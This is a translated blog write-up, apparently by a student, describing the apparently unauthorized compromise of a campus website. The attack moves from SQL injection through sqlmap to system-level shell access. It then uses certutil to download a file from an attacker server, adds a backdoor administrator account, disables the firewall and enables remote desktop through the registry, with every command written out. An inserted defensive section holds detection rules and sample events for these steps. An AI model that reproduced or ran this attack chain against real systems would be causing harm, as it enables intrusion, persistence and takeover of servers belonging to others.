Title: Remember the penetration of campus sites without twists and turns

0x01 Introduction

While preparing for an exam, I accidentally clicked on a site on the campus network and stopped reviewing (just draw the sword).

0x02 Penetration process

Test for injection

http://url/newdetail.aspx?id=11999' or 1=1 --

Sqlmap is used directly, and there is no WAF (dog head)

Take a casual look around

python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch --dbs

python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch --users

DBMS: SQL Server 2005

whoami returns nt authority\system, which is a built-in system management account

Check the directory: chdir

dir c:\

OS version: Microsoft(R) Windows(R) Server 2003, Enterprise Edition

ipconfig

Whether certutil exists on the server decides the next step, so test the download command.

On the VPS:

python -m SimpleHTTPServer 80

Call it from the target:

ping wt070h.dnslog.cn

certutil.exe -urlcache -split -f http://funny_ip/amazing1x

The callback shows up (echo received)

However, the website path contains Chinese characters, so writing a trojan there comes out garbled. I found a solution, but it failed.

Look at the environment variables

I scanned the ports with Nmap because there was some problem when trying to connect remotely. At first I did not know the reason, so I planned to take a look.

Try to create a new user so that 3389 can be connected to remotely

#Create a new user

net user amazingadmin123 amazing.123456 /add

#Grant permissions

net localgroup Administrators amazingadmin123 /add

#Activate the user

net user amazingadmin123 /active:yes

#Close the firewall

netsh firewall set opmode mode=disable

#Reset to the default settings

netsh firewall reset

Open port 3389 through the registry

echo Windows Registry Editor Version 5.00 > 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 3389.reg

echo "fDenyTSConnections"=dword:00000000 >> 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 3389.reg

echo "PortNumber"=dword:00000D3D >> 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 3389.reg

echo "PortNumber"=dword:00000D3D >> 3389.reg

regedit /s 3389.reg

Related records
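An added detection example, not part of the original write-up, covering the certutil download, the account and firewall commands and the registry step above: it scores constructed process-creation events (parent image, image, command line, in the shape of a Sysmon-style record) against the command shapes used in this chain. That the commands were spawned by the database service process (sqlservr.exe) is an assumption the post does not state.

```python
import re
from collections import Counter

# Rule names follow the steps of the write-up; each regex is applied to one command line.
RULES = [
    ("recon",            re.compile(r"\b(whoami|ipconfig|systeminfo)\b", re.I)),
    ("download-tool",    re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("user-add",         re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("admin-group-add",  re.compile(r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
    ("firewall-disable", re.compile(r"\bnetsh\s+firewall\s+set\s+opmode\b.*disable", re.I)),
    ("rdp-enable",       re.compile(r"fDenyTSConnections|\bregedit(\.exe)?\s+/s\b", re.I)),
]
DB_SERVICE = re.compile(r"\\sqlservr\.exe$", re.I)
POST_EXPLOIT = {"download-tool", "user-add", "admin-group-add", "firewall-disable", "rdp-enable"}

def evaluate(parent_image, image, command_line):
    """Tags for one process-creation event: matched command-line rules, plus a tag when the
    database service itself spawns a command shell (assumed: that is how the injected os-shell ran)."""
    tags = [name for name, pat in RULES if pat.search(command_line)]
    if DB_SERVICE.search(parent_image) and image.lower().endswith("\\cmd.exe"):
        tags.append("db-service-spawned-shell")
    return tags

def assess(events):
    """Aggregate tags over one host's events. Alert on the shell-from-database anomaly alone,
    or when at least two distinct post-exploitation steps appear together."""
    tally = Counter()
    for parent_image, image, command_line in events:
        tally.update(evaluate(parent_image, image, command_line))
    alert = "db-service-spawned-shell" in tally or len(POST_EXPLOIT & set(tally)) >= 2
    return alert, dict(tally)

# Constructed sample telemetry as (parent image, image, command line), mirroring the sequence above.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\WINDOWS\system32\cmd.exe"
EXPLORER = r"C:\WINDOWS\explorer.exe"
SAMPLE_EVENTS = [
    (SQL, CMD, "cmd.exe /c whoami"),
    (CMD, r"C:\WINDOWS\system32\certutil.exe", "certutil.exe -urlcache -split -f http://funny_ip/amazing1x"),
    (CMD, r"C:\WINDOWS\system32\net.exe", "net user amazingadmin123 Admin@12$12 /add"),
    (CMD, r"C:\WINDOWS\system32\net.exe", "net localgroup Administrators amazingadmin123 /add"),
    (CMD, r"C:\WINDOWS\system32\netsh.exe", "netsh firewall set opmode mode=disable"),
    (CMD, r"C:\WINDOWS\regedit.exe", "regedit /s 3389.reg"),
    (EXPLORER, r"C:\WINDOWS\notepad.exe", "notepad.exe"),                      # benign noise
]
BENIGN_EVENTS = [(EXPLORER, CMD, "cmd.exe /c dir"), (EXPLORER, r"C:\WINDOWS\notepad.exe", "notepad.exe")]

if __name__ == "__main__":
    print(assess(SAMPLE_EVENTS))   # alert, with one tag per step of the chain
    print(assess(BENIGN_EVENTS))   # no alert
```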

Related records

I tried this process two or three times in a row, but it failed and I could not find the reason. The service was then turned off, so I had to take the exam first and wait for the administrator to turn the machine back on.

The website came back online on the third day after the exam. Try creating a new user again.

It turns out to be a security-policy problem: a simple password is not allowed. Just use a complex password when creating the new user.

Remote connection

The configuration is loading.

0x03 Summary

1. Found an injection point on the home page: http://url/newdetail.aspx?id=11999' or 1=1 --

2. Injected through sqlmap and executed commands:

sql-shell> select @@version; // query the database version
sql-os> whoami // shows system permissions
sql-os> chdir // view the directory
sql-os> dir c: // list the C: drive
sql-os> systeminfo // view the system version
sql-os> ipconfig // view the system IP
sql-os> certutil // test whether the certutil download command exists

3. Built an HTTP server on the VPS: python -m SimpleHTTPServer 80

4. The exe generated by CS can be uploaded to the VPS server.

5. Scanned the target's open ports with Nmap and found 3389 open.

6. Created a user, added it to the Administrators group, enabled the account and turned off the firewall:

# Create a new user
sql-os> net user amazingadmin123 Admin@12$12 /add
# Grant permissions
sql-os> net localgroup Administrators amazingadmin123 /add
# Activate the user
sql-os> net user amazingadmin123 /active:yes
# Close the firewall
sql-os> netsh firewall set opmode mode=disable

7. Successfully connected remotely through mstsc.

Original link: https://xz.aliyun.com/t/9444
